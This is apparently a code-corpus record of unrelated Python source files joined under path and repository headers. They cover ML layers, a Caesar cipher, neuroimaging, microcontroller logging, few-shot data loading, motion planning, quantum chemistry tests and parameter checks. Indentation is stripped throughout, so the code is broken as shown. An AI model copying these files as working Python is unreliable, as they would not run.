def get_config(self):
return {
'name': 'pool',
'_type': self._type,
'kernel_size': self.kernel_size,
'strides': self.strides,
**super(PoolLayer, self).get_config(),
}
@staticmethod
def set_from_config(layer_config, layer_init=None):
pool_layer = PoolLayer(**layer_config)
pool_layer._init = layer_init
return pool_layer
def build(self, _input, net: BasicModel, store_output_op=False):
output = _input
if not self.ready:
return output
with tf.variable_scope(self._id):
self._scope = tf.get_variable_scope().name
param_initializer = self.param_initializer
if self.pre_activation:
# batch normalization
if self.use_bn:
output = BasicModel.batch_norm(output, net.is_training, net.net_config.bn_epsilon,
net.net_config.bn_decay, param_initializer=param_initializer)
# activation
output = BasicModel.activation(output, self.activation)
# Pooling
if self._type == 'avg':
output = BasicModel.avg_pool(output, k=self.kernel_size, s=self.strides)
elif self._type == 'max':
output = BasicModel.max_pool(output, k=self.kernel_size, s=self.strides)
else:
raise ValueError('Do not support the pooling type: %s' % self._type)
else:
# Pooling
if self._type == 'avg':
output = BasicModel.avg_pool(output, k=self.kernel_size, s=self.strides)
elif self._type == 'max':
output = BasicModel.max_pool(output, k=self.kernel_size, s=self.strides)
else:
raise ValueError('Do not support the pooling type: %s' % self._type)
# batch normalization
if self.use_bn:
output = BasicModel.batch_norm(output, net.is_training, net.net_config.bn_epsilon,
net.net_config.bn_decay, param_initializer=param_initializer)
# activation
output = BasicModel.activation(output, self.activation)
# dropout
output = BasicModel.dropout(output, self.keep_prob, net.is_training)
if store_output_op:
self.output_op = output
return output
def set_identity_layer(self, strict=True, param=None, noise=None):
raise ValueError('Pooling layer can never be an identity layer')
def prev_widen(self, indices, magnifier, noise=None):
self.widen_bn(indices, magnifier, noise=noise)
|
pycipher/caesar.py
|
onlykood/pycipher
| 196 |
75776
|
<reponame>onlykood/pycipher
#implements Caesar substitution cipher
#Author: <NAME>
#Created: 2012-04-28
from pycipher.base import Cipher
class Caesar(Cipher):
"""The Caesar Cipher has a key consisting of an integer 1-25.
This cipher encrypts a letter according to the following equation::
c = (p + key)%26
where c is the ciphertext letter, p the plaintext letter.
For more details on the Caesar cipher, see http://www.practicalcryptography.com/ciphers/caesar-cipher/
:param key: The additive key. Allowable values are integers 0-25.
"""
def __init__(self,key=13):
self.key = key % 26
def encipher(self,string,keep_punct=False):
r"""Encipher string using Caesar cipher according to initialised key.
Example::
ciphertext = Caesar(3).encipher(plaintext)
:param string: The string to encipher.
:param keep_punct: if true, punctuation and spacing are retained. If false, it is all removed. Default is False.
:returns: The enciphered string.
"""
if not keep_punct: string = self.remove_punctuation(string)
ret = ''
for c in string:
if c.isalpha(): ret += self.i2a( self.a2i(c) + self.key )
else: ret += c
return ret
def decipher(self,string,keep_punct=False):
r"""Decipher string using Caesar cipher according to initialised key.
Example::
plaintext = Caesar(3).decipher(ciphertext)
:param string: The string to decipher.
:param keep_punct: if true, punctuation and spacing are retained. If false, it is all removed. Default is False.
:returns: The deciphered string.
"""
if not keep_punct: string = self.remove_punctuation(string)
ret = ''
for c in string:
if c.isalpha(): ret += self.i2a( self.a2i(c) - self.key )
else: ret += c
return ret
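# A minimal worked example of the key arithmetic documented above (pure arithmetic, so it does
# not rely on the a2i/i2a helpers inherited from the Cipher base class): with key = 3,
#   p = 0              # 'A'
#   c = (p + 3) % 26   # 3, i.e. 'D'
# and deciphering computes (c - 3) % 26 = 0, recovering 'A'. Wrap-around works the same way:
# 'Z' (p = 25) enciphers to (25 + 3) % 26 = 2, i.e. 'C'.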
if __name__ == '__main__':
print('use "import pycipher" to access functions')
|
examples/searchlight/genre_searchlight_example.py
|
osaaso3/brainiak
| 235 |
75799
|
<reponame>osaaso3/brainiak
# The following code is designed to perform a searchlight at every voxel in the brain, looking
# at the difference in pattern similarity between musical genres (i.e. classical and jazz).
# In the study where the data was obtained, subjects were required to listen to a set of 16
# songs twice (two runs) in an fMRI scanner. The 16 songs consisted of 8 jazz songs and
# 8 classical songs. The goal of this searchlight is to find voxels that seem to represent
# distinct information about these different musical genres. Presumably, these voxels would be
# found in the auditory cortex, which happens to be the most organized system in the brain for
# processing sound information.
import numpy as np
import time
from mpi4py import MPI
from nilearn.image import load_img
import sys
from brainiak.searchlight.searchlight import Searchlight
from scipy import stats
from scipy.sparse import random
import os
# MPI variables
comm = MPI.COMM_WORLD
rank = comm.rank
size = comm.size
# Generate random data
if rank == 0:
np.random.seed(0)
data1_rand = np.random.rand(91,109,91,16)
data2_rand = np.random.rand(91,109,91,16)
classical = np.random.rand(2600)
jazz = np.random.rand(2600)
d1_reshape = np.reshape(data1_rand,(91*109*91,16))
d2_reshape = np.reshape(data2_rand,(91*109*91,16))
a1 = load_img('a1plus_2mm.nii.gz')
a1_vec = np.reshape(a1.get_data(),(91*109*91))
a1_idx = np.nonzero(a1_vec)
for i in range(8):
d1_reshape[a1_idx[0],i] += classical
d1_reshape[a1_idx[0],i+8] += jazz
d2_reshape[a1_idx[0],i] += classical
d2_reshape[a1_idx[0],i+8] += jazz
data1 = np.reshape(d1_reshape,(91,109,91,16))
data2 = np.reshape(d2_reshape,(91,109,91,16))
# Flatten data, then zscore data, then reshape data back into MNI coordinate space
data1 = stats.zscore(np.reshape(data1,(91*109*91,16)))
data1 = np.reshape(data1,(91,109,91,16))
data2 = stats.zscore(np.reshape(data2,(91*109*91,16)))
data2 = np.reshape(data2,(91,109,91,16))
else:
data1 = None
data2 = None
# Load mask
mask_img = load_img('MNI152_T1_2mm_brain_mask.nii')
mask_img = mask_img.get_data()
# Define a function that takes the difference between within- vs. between-genre comparisons
def corr2_coeff(AB,msk,myrad,bcast_var):
if not np.all(msk):
return None
A,B = (AB[0], AB[1])
A = A.reshape((-1,A.shape[-1]))
B = B.reshape((-1,B.shape[-1]))
corrAB = np.corrcoef(A.T,B.T)[16:,:16]
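# corrAB[i, j] is the correlation between song i of run 2 (B) and song j of run 1 (A);
# with classical songs at indices 0-7 and jazz at 8-15 (as constructed above), the four
# 8x8 blocks below give the within-classical, within-jazz and two between-genre means.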
classical_within = np.mean(corrAB[0:8,0:8])
jazz_within = np.mean(corrAB[8:16,8:16])
classJazz_between = np.mean(corrAB[8:16,0:8])
jazzClass_between = np.mean(corrAB[0:8,8:16])
within_genre = np.mean([classical_within,jazz_within])
between_genre = np.mean([classJazz_between,jazzClass_between])
diff = within_genre - between_genre
return diff
comm.Barrier()
begin_time = time.time()
comm.Barrier()
# Create and run searchlight
sl = Searchlight(sl_rad=1,max_blk_edge=5)
sl.distribute([data1,data2],mask_img)
sl.broadcast(None)
global_outputs = sl.run_searchlight(corr2_coeff)
comm.Barrier()
end_time = time.time()
comm.Barrier()
# Plot searchlight results
if rank == 0:
print('Searchlight Done: ', end_time - begin_time)
maxval = np.max(global_outputs[np.not_equal(global_outputs,None)])
minval = np.min(global_outputs[np.not_equal(global_outputs,None)])
global_outputs = np.array(global_outputs, dtype=float)
print(global_outputs)
# Save searchlight images
out_dir = "searchlight_images"
if not os.path.exists(out_dir):
os.makedirs(out_dir)
import matplotlib.pyplot as plt
for (cnt, img) in enumerate(global_outputs):
plt.imshow(img,vmin=minval,vmax=maxval)
plt.colorbar()
plt.savefig('searchlight_images/' + 'img' + str(cnt) + '.png')
plt.clf()
|
Adafruit_QT_Py_ESP32-S2/Storage/code.py
|
gamblor21/Adafruit_Learning_System_Guides
| 665 |
75802
|
# SPDX-FileCopyrightText: 2021 <NAME> for Adafruit Industries
# SPDX-License-Identifier: Unlicense
"""
CircuitPython Essentials Storage CP Filesystem code.py file
"""
import time
import board
import microcontroller
import neopixel
pixel = neopixel.NeoPixel(board.NEOPIXEL, 1)
try:
with open("/temperature.txt", "a") as temp_log:
while True:
# The microcontroller temperature in Celsius. Include the
# math to do the C to F conversion here, if desired.
temperature = microcontroller.cpu.temperature
# Write the temperature to the temperature.txt file every 10 seconds.
temp_log.write('{0:.2f}\n'.format(temperature))
temp_log.flush()
# Blink the NeoPixel on every write...
pixel.fill((255, 0, 0))
time.sleep(1) # ...for one second.
pixel.fill((0, 0, 0)) # Then turn it off...
time.sleep(9) # ...for the other 9 seconds.
except OSError as e: # When the filesystem is NOT writable by CircuitPython...
delay = 0.5 # ...blink the NeoPixel every half second.
if e.args[0] == 28: # If the file system is full...
delay = 0.15 # ...blink the NeoPixel every 0.15 seconds!
while True:
pixel.fill((255, 0, 0))
time.sleep(delay)
pixel.fill((0, 0, 0))
time.sleep(delay)
|
core/data/collates/collate_functions.py
|
cjy97/LibFewShot
| 471 |
75806
|
# -*- coding: utf-8 -*-
import itertools
from collections.abc import Iterable
import torch
class GeneralCollateFunction(object):
"""A Generic `Collate_fn`.
For finetuning-train.
"""
def __init__(self, trfms, times):
"""Initialize a `GeneralCollateFunction`.
Args:
trfms (list): A list of torchvision transforms.
times (int): Specify the augment times (0 or 1 means no augmentation).
"""
super(GeneralCollateFunction, self).__init__()
self.trfms = trfms
self.times = times
def method(self, batch):
"""Apply transforms and augmentations on a batch.
The images and targets in a batch are augmented by the number of `self.times` and the targets are augmented
to match the shape of images.
Args:
batch (list of tuple): A batch returned by dataset.
Returns:
tuple: A tuple of (images, targets), here len(images)=len(targets).
"""
try:
images, targets = zip(*batch)
images = list(itertools.chain.from_iterable([[image] * self.times for image in images]))
images = [self.trfms(image).unsqueeze(0) for image in images]
targets = list(
itertools.chain.from_iterable([[target] * self.times for target in targets])
)
targets = [torch.tensor([target]) for target in targets]
assert len(images) == len(targets), "Inconsistent number of images and labels!"
images = torch.cat(images)
targets = torch.tensor(targets, dtype=torch.int64)
return images, targets
except TypeError:
raise TypeError(
"Error, probably because the transforms are passed to the dataset, the transforms should be "
"passed to the collate_fn"
)
def __call__(self, batch):
return self.method(batch)
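# A minimal usage sketch (the dataset name and transform choice are hypothetical, shown only
# for illustration): the collate function is handed to the DataLoader rather than to the
# dataset, as the error message above points out.
#
#   from torch.utils.data import DataLoader
#   from torchvision import transforms
#
#   trfms = transforms.Compose([transforms.Resize((84, 84)), transforms.ToTensor()])
#   collate_fn = GeneralCollateFunction(trfms, times=2)
#   loader = DataLoader(my_pil_dataset, batch_size=4, collate_fn=collate_fn)
#   images, targets = next(iter(loader))  # images: [8, C, 84, 84], targets: [8]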
class FewShotAugCollateFunction(object):
"""`Collate_fn` for few-shot dataloader.
For finetuning-val, finetuning-test and meta/metric-train/val/test.
"""
def __init__(self, trfms, times, times_q, way_num, shot_num, query_num, episode_size):
"""Initialize a `FewShotAugCollateFunction`.
Args:
trfms (list or tuple of list): A torchvision transform list, or a tuple of 2 torchvision transform lists.
If a `list`, the same transforms are applied to both support and query images; otherwise the 1st list
applies to support images and the 2nd applies to query images.
times (int): Augment times of support images
times_q (int): Augment times of query images
way_num (int): Few-shot way setting
shot_num (int): Few-shot shot setting
query_num (int): Few-shot query setting
episode_size (int): Few-shot episode size setting
"""
super(FewShotAugCollateFunction, self).__init__()
try:
self.trfms_support, self.trfms_query = trfms
except Exception:
self.trfms_support = self.trfms_query = trfms
# Allow different trfms: when single T, apply to S and Q equally;
# When trfms=(T,T), apply to S and Q separately;
self.times = 1 if times == 0 else times
self.times_q = 1 if times_q == 0 else times_q
self.way_num = way_num
self.shot_num = shot_num
self.query_num = query_num
self.shot_aug = self.shot_num * self.times
self.query_aug = self.query_num * self.times_q
self.episode_size = episode_size
def method(self, batch):
"""Apply transforms and augmentations on a **few-shot** batch.
The samples of query and support are augmented separately.
For example: if aug_times=5, then 01234 -> 0000011111222223333344444.
Args:
batch (list of tuple): A batch returned by a few-shot dataset.
Returns:
tuple: a tuple of (images, gt_labels).
"""
try:
images, labels = zip(
*batch
) # images = [img_label_tuple[0] for img_label_tuple in batch] # 111111222222 (5s1q for example)
images_split_by_label = [
images[index : index + self.shot_num + self.query_num]
for index in range(0, len(images), self.shot_num + self.query_num)
] # 111111; 222222 ;
images_split_by_label_type = [
[spt_qry[: self.shot_num], spt_qry[self.shot_num :]]
for spt_qry in images_split_by_label
] # 11111,1;22222,2; == [shot, query]
# aug support
# fixme: should have an elegant method
# 1111111111,1;2222222222,2 (aug_time = 2 for example)
for cls in images_split_by_label_type:
cls[0] = cls[0] * self.times # aug support
cls[1] = cls[1] * self.times_q # aug query
# flatten and apply trfms
flat = lambda t: [x for sub in t for x in flat(sub)] if isinstance(t, Iterable) else [t]
images = flat(images_split_by_label_type)
# 1111111111122222222222
# images = [self.trfms(image) for image in images] # list of tensors([c, h, w])
images = [
self.trfms_support(image)
if index % (self.shot_aug + self.query_aug) < self.shot_aug
else self.trfms_query(image)
for index, image in enumerate(images)
] # list of tensors([c, h, w])
images = torch.stack(images) # [b', c, h, w] <- b' = b after aug
# labels
# global_labels = torch.tensor(labels,dtype=torch.int64)
# global_labels = torch.tensor(labels,dtype=torch.int64).reshape(self.episode_size,self.way_num,
# self.shot_num*self.times+self.query_num)
global_labels = torch.tensor(labels, dtype=torch.int64).reshape(
self.episode_size, self.way_num, self.shot_num + self.query_num
)
global_labels = (
global_labels[..., 0]
.unsqueeze(-1)
.repeat(
1,
1,
self.shot_num * self.times + self.query_num * self.times_q,
)
)
return images, global_labels
# images.shape = [e*w*(q+s) x c x h x w], global_labels.shape = [e x w x (q+s)]
except TypeError:
raise TypeError(
"Error, probably because the transforms are passed to the dataset, the transforms should be "
"passed to the collate_fn"
)
def __call__(self, batch):
return self.method(batch)
|
pointers/pointers.py
|
lootek/govspy
| 106 |
75807
|
# There is no equivalent to pointers in python
def upit(str):
return str.upper()
def uplist(mylist):
for i in range(len(mylist)):
mylist[i] = mylist[i].upper()
name = "peter"
upit(name)
print(name) # peter
name = upit(name)
print(name) # PETER
# but you can do a useless cheat and make it mutable
name = list("peter")
uplist(name)
name = ''.join(name)
print(name) # PETER
|
lib/training/train_factory.py
|
shachargluska/centerpose
| 245 |
75831
|
from __future__ import absolute_import, division, print_function
from .multi_pose import MultiPoseTrainer
train_factory = {
'multi_pose': MultiPoseTrainer,
}
|
examples/optimization/multiobjective/constnsga2jpq.py
|
sveilleux1/pybrain
| 2,208 |
75832
|
<gh_stars>1000+
from __future__ import print_function
#!/usr/bin/env python
""" An illustration of using the NSGA-II multi-objective optimization algorithm
on Constrained Multi-Objective Optimization benchmark function. """
__author__ = '<NAME>, <EMAIL>'
from pybrain.optimization import ConstMultiObjectiveGA
from pybrain.rl.environments.functions.multiobjective import ConstDeb,ConstSrn, \
ConstOsy,ConstTnk,ConstBnh
import pylab
from numpy import zeros, array
# The Deb function
#f = ConstDeb()
# The Srinivas & Deb function
#f = ConstSrn()
# The Osyczka & Kundu function
#f = ConstOsy()
# The Tanaka function
#f = ConstTnk()
# The Binh & Korn function
f = ConstBnh()
# start at the origin
x0 = zeros(f.indim)
x0 = array([min_ for min_, max_ in f.xbound])
# run the optimization for a maximum of 50 generations
n = ConstMultiObjectiveGA(f, x0, storeAllEvaluations = True, populationSize = 100, eliteProportion = 1.0,
topProportion = 1.0, mutationProb = 1.0, mutationStdDev = 0.3, storeAllPopulations = True, allowEquality = False)
print('Start Learning')
n.learn(50)
print('End Learning')
# plotting the results (blue = all evaluated points, red = resulting pareto front)
print('Plotting the Results')
print('All Evaluations.... take some time')
for x in n._allEvaluations:
if x[1]:
pylab.plot([x[0][0]], [x[0][1]], 'b.')
else:
pylab.plot([x[0][0]], [x[0][1]], 'r.')
for x in n.bestEvaluation: pylab.plot([x[0][0]], [x[0][1]], 'go')
pylab.show()
print('Pareto Front')
for x in n.bestEvaluation: pylab.plot([x[0][0]], [x[0][1]], 'go')
pylab.show()
print('===========')
print('= Results =')
print('===========')
'''
i=0
for gen in n._allGenerations:
print 'Generation: ',i
for j in range(len(gen[1])):
print gen[1].keys()[j],gen[1].values()[j]
i+=1
'''
print('Population size ',n.populationSize)
print('Elitism Proportion ',n.eliteProportion)
print('Mutation Probability ',n.mutationProb)
print('Mutation Std Deviation ',n.mutationStdDev)
print('Objective Evaluation number ',n.numEvaluations)
print('last generation Length of bestEvaluation ',len(n.bestEvaluation))
print('Best Evaluable : Best Evaluation')
for i in range(len(n.bestEvaluation)):
assert len(n.bestEvaluation) == len(n.bestEvaluable)
print(n.bestEvaluable[i],':',n.bestEvaluation[i])
|
dassl/evaluation/build.py
|
Fyy10/Dassl.pytorch
| 563 |
75859
|
from dassl.utils import Registry, check_availability
EVALUATOR_REGISTRY = Registry("EVALUATOR")
def build_evaluator(cfg, **kwargs):
avai_evaluators = EVALUATOR_REGISTRY.registered_names()
check_availability(cfg.TEST.EVALUATOR, avai_evaluators)
if cfg.VERBOSE:
print("Loading evaluator: {}".format(cfg.TEST.EVALUATOR))
return EVALUATOR_REGISTRY.get(cfg.TEST.EVALUATOR)(cfg, **kwargs)
|
pylot/planning/hybrid_astar/hybrid_astar_planner.py
|
mageofboy/pylot
| 231 |
75861
|
from hybrid_astar_planner.HybridAStar.hybrid_astar_wrapper \
import apply_hybrid_astar
import numpy as np
from pylot.planning.planner import Planner
class HybridAStarPlanner(Planner):
"""Wrapper around the Hybrid A* planner.
Note:
Details can be found at `Hybrid A* Planner`_.
Args:
world: (:py:class:`~pylot.planning.world.World`): A reference to the
planning world.
flags (absl.flags): Object to be used to access absl flags.
.. _Hybrid A* Planner:
https://github.com/erdos-project/hybrid_astar_planner
"""
def __init__(self, world, flags, logger):
super().__init__(world, flags, logger)
self._hyperparameters = {
"step_size": flags.step_size_hybrid_astar,
"max_iterations": flags.max_iterations_hybrid_astar,
"completion_threshold": flags.completion_threshold,
"angle_completion_threshold": flags.angle_completion_threshold,
"rad_step": flags.rad_step,
"rad_upper_range": flags.rad_upper_range,
"rad_lower_range": flags.rad_lower_range,
"obstacle_clearance": flags.obstacle_clearance_hybrid_astar,
"lane_width": flags.lane_width_hybrid_astar,
"radius": flags.radius,
"car_length": flags.car_length,
"car_width": flags.car_width,
}
def run(self, timestamp, ttd=None):
"""Runs the planner.
Note:
The planner assumes that the world is up-to-date.
Returns:
:py:class:`~pylot.planning.waypoints.Waypoints`: Waypoints of the
planned trajectory.
"""
obstacle_list = self._world.get_obstacle_list()
if len(obstacle_list) == 0:
# Do not use Hybrid A* if there are no obstacles.
output_wps = self._world.follow_waypoints(self._flags.target_speed)
else:
# Hybrid A* does not take the drivable region into account.
# It constructs the search space as a top-down, minimum bounding
# rectangle with padding in each dimension.
self._logger.debug("@{}: Hyperparameters: {}".format(
timestamp, self._hyperparameters))
initial_conditions = self._compute_initial_conditions(
obstacle_list)
self._logger.debug("@{}: Initial conditions: {}".format(
timestamp, initial_conditions))
path_x, path_y, _, success = apply_hybrid_astar(
initial_conditions, self._hyperparameters)
if success:
self._logger.debug(
"@{}: Hybrid A* succeeded".format(timestamp))
speeds = [self._flags.target_speed] * len(path_x)
self._logger.debug("@{}: Hybrid A* Path X: {}".format(
timestamp, path_x.tolist()))
self._logger.debug("@{}: Hybrid A* Path Y: {}".format(
timestamp, path_y.tolist()))
self._logger.debug("@{}: Hybrid A* Speeds: {}".format(
timestamp, speeds))
output_wps = self.build_output_waypoints(
path_x, path_y, speeds)
else:
self._logger.error("@{}: Hybrid A* failed. "
"Sending emergency stop.".format(timestamp))
output_wps = self._world.follow_waypoints(0)
return output_wps
def _compute_initial_conditions(self, obstacles):
ego_transform = self._world.ego_transform
start = np.array([
ego_transform.location.x,
ego_transform.location.y,
np.deg2rad(ego_transform.rotation.yaw),
])
self._world.waypoints.remove_completed(ego_transform.location)
end_index = min(self._flags.num_waypoints_ahead,
len(self._world.waypoints.waypoints) - 1)
if end_index < 0:
# If no more waypoints are left, then our location is our end waypoint.
self._logger.debug("No more waypoints left")
end_wp = ego_transform
else:
end_wp = self._world.waypoints.waypoints[end_index]
end = np.array([
end_wp.location.x, end_wp.location.y,
np.deg2rad(ego_transform.rotation.yaw)
])
initial_conditions = {
"start": start,
"end": end,
"obs": obstacles,
}
return initial_conditions
|
pyscf/pbc/cc/test/test_kuccsd_supercell_vs_kpts.py
|
robert-anderson/pyscf
| 501 |
75871
|
<reponame>robert-anderson/pyscf
import unittest
import numpy
from pyscf.pbc import gto
from pyscf.pbc import scf,cc
from pyscf import cc as mol_cc
from pyscf.pbc.tools.pbc import super_cell
#from pyscf import lib
#from pyscf.pbc import gto
#from pyscf.pbc import scf,cc
#from pyscf.pbc.cc import kccsd_uhf
#from pyscf.pbc.cc import kccsd
#from pyscf.pbc.cc import eom_kccsd_ghf
#from pyscf.pbc.cc import eom_kccsd_uhf
#from pyscf.pbc.lib import kpts_helper
#from pyscf.pbc.tools.pbc import super_cell
# generating the cell
cell = gto.M(
unit = 'B',
a = [[ 0., 3.37013733, 3.37013733],
[ 3.37013733, 0., 3.37013733],
[ 3.37013733, 3.37013733, 0. ]],
mesh = [13]*3,
atom = '''He 0 0 0
He 1.68506866 1.68506866 1.68506866''',
basis = [[0, (1., 1.)], [0, (.5, 1.)]],
verbose = 0,
)
nmp = [3,3,1]
# treating supercell at gamma point
supcell = super_cell(cell,nmp)
gmf = scf.UHF(supcell,exxdiv=None)
ehf = gmf.kernel()
gcc = cc.UCCSD(gmf)
ecc, t1, t2 = gcc.kernel()
print('UHF energy (supercell) %f \n' % (float(ehf)/numpy.prod(nmp)+4.343308413289))
print('UCCSD correlation energy (supercell) %f \n' % (float(ecc)/numpy.prod(nmp)+0.009470753047083676))
# treating mesh of k points
kpts = cell.make_kpts(nmp)
kpts -= kpts[0]
kmf = scf.KUHF(cell,kpts,exxdiv=None)
ehf = kmf.kernel()
kcc = cc.KUCCSD(kmf)
ecc, t1, t2 = kcc.kernel()
print('UHF energy (kpts) %f \n' % (float(ehf+4.343308413289)))
print('UCCSD correlation energy (kpts) %f \n' % (float(ecc+0.009470753047083676)))
|
DeepAlignmentNetwork/menpofit/checks.py
|
chiawei-liu/DeepAlignmentNetwork
| 220 |
75973
|
<filename>DeepAlignmentNetwork/menpofit/checks.py
import warnings
import collections
from functools import partial
import numpy as np
from menpo.base import name_of_callable
from menpo.shape import TriMesh
from menpo.transform import PiecewiseAffine
def check_diagonal(diagonal):
r"""
Checks that the diagonal length used to normalize the images' size is
``>= 20``.
Parameters
----------
diagonal : `int`
The value to check.
Returns
-------
diagonal : `int`
The value if it's correct.
Raises
------
ValueError
diagonal must be >= 20 or None
"""
if diagonal is not None and diagonal < 20:
raise ValueError("diagonal must be >= 20 or None")
return diagonal
def check_landmark_trilist(image, transform, group=None):
r"""
Checks that the provided image has a triangulated shape (thus an instance of
`menpo.shape.TriMesh`) and the transform is `menpo.transform.PiecewiseAffine`
Parameters
----------
image : `menpo.image.Image` or subclass
The input image.
transform : `menpo.transform.PiecewiseAffine`
The transform object.
group : `str` or ``None``, optional
The group of the shape to check.
Raises
------
Warning
The given images do not have an explicit triangulation applied. A
Delaunay Triangulation will be computed and used for warping. This may
be suboptimal and cause warping artifacts.
"""
shape = image.landmarks[group].lms
check_trilist(shape, transform)
def check_trilist(shape, transform):
r"""
Checks that the provided shape is triangulated (thus an instance of
`menpo.shape.TriMesh`) and the transform is `menpo.transform.PiecewiseAffine`
Parameters
----------
shape : `menpo.shape.TriMesh`
The input shape (usually the reference/mean shape of a model).
transform : `menpo.transform.PiecewiseAffine`
The transform object.
Raises
------
Warning
The given images do not have an explicit triangulation applied. A
Delaunay Triangulation will be computed and used for warping. This may
be suboptimal and cause warping artifacts.
"""
if not isinstance(shape, TriMesh) and isinstance(transform,
PiecewiseAffine):
warnings.warn('The given images do not have an explicit triangulation '
'applied. A Delaunay Triangulation will be computed '
'and used for warping. This may be suboptimal and cause '
'warping artifacts.')
def check_scales(scales):
r"""
Checks that the provided `scales` argument is either `int` or `float` or an
iterable of those. It makes sure that it returns a `list` of `scales`.
Parameters
----------
scales : `int` or `float` or `list/tuple` of those
The value to check.
Returns
-------
scales : `list` of `int` or `float`
The scales in a list.
Raises
------
ValueError
scales must be an int/float or a list/tuple of int/float
"""
if isinstance(scales, (int, float)):
return [scales]
elif len(scales) == 1 and isinstance(scales[0], (int, float)):
return list(scales)
elif len(scales) > 1:
return check_scales(scales[0]) + check_scales(scales[1:])
else:
raise ValueError("scales must be an int/float or a list/tuple of "
"int/float")
def check_multi_scale_param(n_scales, types, param_name, param):
r"""
General function for checking a parameter defined for multiple scales. It
raises an error if the parameter is not an iterable with the correct size and
correct types.
Parameters
----------
n_scales : `int`
The number of scales.
types : `tuple`
The `tuple` of variable types that the parameter is allowed to have.
param_name : `str`
The name of the parameter.
param : `types`
The parameter value.
Returns
-------
param : `list` of `types`
The list of values per scale.
Raises
------
ValueError
{param_name} must be in {types} or a list/tuple of {types} with the same
length as the number of scales
"""
error_msg = "{0} must be in {1} or a list/tuple of " \
"{1} with the same length as the number " \
"of scales".format(param_name, types)
# Could be a single value - or we have an error
if isinstance(param, types):
return [param] * n_scales
elif not isinstance(param, collections.Iterable):
raise ValueError(error_msg)
# Must be an iterable object
len_param = len(param)
isinstance_all_in_param = all(isinstance(p, types) for p in param)
if len_param == 1 and isinstance_all_in_param:
return list(param) * n_scales
elif len_param == n_scales and isinstance_all_in_param:
return list(param)
else:
raise ValueError(error_msg)
def check_callable(callables, n_scales):
r"""
Checks the callable type per level.
Parameters
----------
callables : `callable` or `list` of `callables`
The callable to be used per scale.
n_scales : `int`
The number of scales.
Returns
-------
callable_list : `list`
A `list` of callables.
Raises
------
ValueError
callables must be a callable or a list/tuple of callables with the same
length as the number of scales
"""
if callable(callables):
return [callables] * n_scales
elif len(callables) == 1 and np.alltrue([callable(f) for f in callables]):
return list(callables) * n_scales
elif len(callables) == n_scales and np.alltrue([callable(f)
for f in callables]):
return list(callables)
else:
raise ValueError("callables must be a callable or a list/tuple of "
"callables with the same length as the number "
"of scales")
def check_patch_shape(patch_shape, n_scales):
r"""
Function for checking a multi-scale `patch_shape` parameter value.
Parameters
----------
patch_shape : `list/tuple` of `int/float` or `list` of those
The patch shape per scale
n_scales : `int`
The number of scales.
Returns
-------
patch_shape : `list` of `list/tuple` of `int/float`
The list of patch shape per scale.
Raises
------
ValueError
patch_shape must be a list/tuple of int or a list/tuple of list/tuple of
int/float with the same length as the number of scales
"""
if len(patch_shape) == 2 and isinstance(patch_shape[0], int):
return [patch_shape] * n_scales
elif len(patch_shape) == 1:
return check_patch_shape(patch_shape[0], 1)
elif len(patch_shape) == n_scales:
l1 = check_patch_shape(patch_shape[0], 1)
l2 = check_patch_shape(patch_shape[1:], n_scales-1)
return l1 + l2
else:
raise ValueError("patch_shape must be a list/tuple of int or a "
"list/tuple of lit/tuple of int/float with the "
"same length as the number of scales")
def check_max_components(max_components, n_scales, var_name):
r"""
Checks the maximum number of components per scale. It must be ``None`` or
`int` or `float` or a `list` of those containing ``1`` or ``{n_scales}``
elements.
Parameters
----------
max_components : ``None`` or `int` or `float` or a `list` of those
The value to check.
n_scales : `int`
The number of scales.
var_name : `str`
The name of the variable.
Returns
-------
max_components : `list` of ``None`` or `int` or `float`
The list of max components per scale.
Raises
------
ValueError
{var_name} must be None or an int > 0 or a 0 <= float <= 1 or a list of
those containing 1 or {n_scales} elements
"""
str_error = ("{} must be None or an int > 0 or a 0 <= float <= 1 or "
"a list of those containing 1 or {} elements").format(
var_name, n_scales)
if not isinstance(max_components, (list, tuple)):
max_components_list = [max_components] * n_scales
elif len(max_components) == 1:
max_components_list = [max_components[0]] * n_scales
elif len(max_components) == n_scales:
max_components_list = max_components
else:
raise ValueError(str_error)
for comp in max_components_list:
if comp is not None:
if not isinstance(comp, int):
if not isinstance(comp, float):
raise ValueError(str_error)
return max_components_list
def check_max_iters(max_iters, n_scales):
r"""
Function that checks the value of a `max_iters` parameter defined for
multiple scales. It must be `int` or `list` of `int`.
Parameters
----------
max_iters : `int` or `list` of `int`
The value to check.
n_scales : `int`
The number of scales.
Returns
-------
max_iters : `list` of `int`
The list of values per scale.
Raises
------
ValueError
max_iters can be integer, integer list containing 1 or {n_scales}
elements or None
"""
if type(max_iters) is int:
max_iters = [np.round(max_iters/n_scales)
for _ in range(n_scales)]
elif len(max_iters) == 1 and n_scales > 1:
max_iters = [np.round(max_iters[0]/n_scales)
for _ in range(n_scales)]
elif len(max_iters) != n_scales:
raise ValueError('max_iters can be integer, integer list '
'containing 1 or {} elements or '
'None'.format(n_scales))
return np.require(max_iters, dtype=int)
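# For example: check_max_iters(100, 2) splits the budget across scales and returns
# array([50, 50]), while check_max_iters([40, 10], 2) returns array([40, 10]) unchanged.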
def check_sampling(sampling, n_scales):
r"""
Function that checks the value of a `sampling` parameter defined for
multiple scales. It must be `int` or `ndarray` or `list` of those.
Parameters
----------
sampling : `int` or `ndarray` or `list` of those
The value to check.
n_scales : `int`
The number of scales.
Returns
-------
sampling : `list` of `int` or `ndarray`
The list of values per scale.
Raises
------
ValueError
A sampling list can only contain 1 element or {n_scales} elements
ValueError
sampling can be an integer or ndarray, a integer or ndarray list
containing 1 or {n_scales} elements or None
"""
if (isinstance(sampling, (list, tuple)) and
np.alltrue([isinstance(s, (np.ndarray, np.int)) or sampling is None
for s in sampling])):
if len(sampling) == 1:
return sampling * n_scales
elif len(sampling) == n_scales:
return sampling
else:
raise ValueError('A sampling list can only '
'contain 1 element or {} '
'elements'.format(n_scales))
elif isinstance(sampling, (np.ndarray, np.int)) or sampling is None:
return [sampling] * n_scales
else:
raise ValueError('sampling can be an integer or ndarray, '
'a integer or ndarray list '
'containing 1 or {} elements or '
'None'.format(n_scales))
def set_models_components(models, n_components):
r"""
Function that sets the number of active components to a list of models.
Parameters
----------
models : `list` or `class`
The list of models per scale.
n_components : `int` or `float` or ``None`` or `list` of those
The number of components per model.
Raises
------
ValueError
n_components can be an integer or a float or None or a list containing 1
or {n_scales} of those
"""
if n_components is not None:
n_scales = len(models)
if type(n_components) is int or type(n_components) is float:
for am in models:
am.n_active_components = n_components
elif len(n_components) == 1 and n_scales > 1:
for am in models:
am.n_active_components = n_components[0]
elif len(n_components) == n_scales:
for am, n in zip(models, n_components):
am.n_active_components = n
else:
